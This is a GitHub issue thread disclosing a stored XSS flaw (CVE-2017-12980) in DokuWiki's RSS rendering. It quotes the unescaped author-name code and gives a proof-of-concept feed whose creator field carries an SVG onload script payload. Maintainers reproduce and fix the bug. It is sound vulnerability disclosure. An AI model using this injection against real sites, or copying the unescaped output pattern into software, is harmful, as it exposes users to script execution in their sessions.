New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed #2081

Closed
trichimtrich opened this Issue Aug 16, 2017 · 3 comments

Comments

Projects
None yet
4 participants
@trichimtrich

trichimtrich commented Aug 16, 2017

Bug

Author tag in RSS/Atom feed is not well sanitized (with default config of SimplePIE, it'll not be stripped html special characters, dokuwiki uses the result directly). So attacker can force others to request a remote RSS/Atom feed contains malicious javascript to do requests in their permission.

Detail

/inc/parser/xhtml.php

function rss($url, $params) {
...
if($params['author']) {
    $author = $item->get_author(0);
    if($author) {
        $name = $author->get_name();
        if(!$name) $name = $author->get_email();
        if($name) $this->doc .= ' '.$lang['by'].' '.$name;
    }
}
...
}

PoC

remote RSS

<?xml version="1.0" encoding="ISO-8859-1"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
<item rdf:about="https://aaaapolitics.slashdot.org/story/17/08/16/1911253/after-losing-support-trumps-business-and-manufacturing-councils-are-shutting-down?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed">
<title>testing title</title>
<description>testing desc</description>
<dc:creator><![CDATA[  aaaa<svg onload=alert(1)>  ]]></dc:creator>
<dc:date>2017-08-16T19:20:00+00:00</dc:date>
</item>
</rdf:RDF>

dokuwiki document

{{rss>http://localhost/cc.rss 1 author date description 1h }}
@phy25

This comment has been minimized.

Collaborator

phy25 commented Aug 20, 2017

Reproducible at https://www.dokuwiki.org/sandbox:issue-2081. A fix is available at #2086.

@trichimtrich

This comment has been minimized.

trichimtrich commented Aug 20, 2017

The fixed works well

@fgeek

This comment has been minimized.

fgeek commented Aug 22, 2017

Please use CVE-2017-12980 for this issue.

splitbrain added a commit that referenced this issue Aug 22, 2017

@splitbrain splitbrain changed the title from [Security] Stored XSS in xhtml.php with RSS/Atom feed to CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed Aug 22, 2017

@splitbrain splitbrain closed this Aug 22, 2017

bug added a commit that referenced this issue Aug 22, 2017

bug added a commit that referenced this issue Aug 22, 2017

splitbrain added a commit that referenced this issue Aug 27, 2017

Merge branch 'master' into retrytests
* master: (407 commits)
  do not export the appveyor config
  Added appveyor config for automated windows testing
  Update check supports HTTPS
  fixed some style errors found by scrutinizer
  removed unused, empty files
  some cleanup fpr set_metadata test
  added one more test for internal links
  parsertests: replaced var keywords and added type hints
  Fix p_set_metadata damaging contributors with numeric ID
  Add tests for array_replace part of set_metadata
  Fix rendering null $language going to GeSHi (fixes #2088)
  Fix RSS syntax XSS bug (#2081)
  Fix sanitation of $language for code highlighting (fixes #2080)
  translation update
  fix(config): empty string is valid for numericopt
  removed old tpl_content_core method
  updated composer dependencies
  Removed progressbar from searchform
  Release preparation
  translation update
  ...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment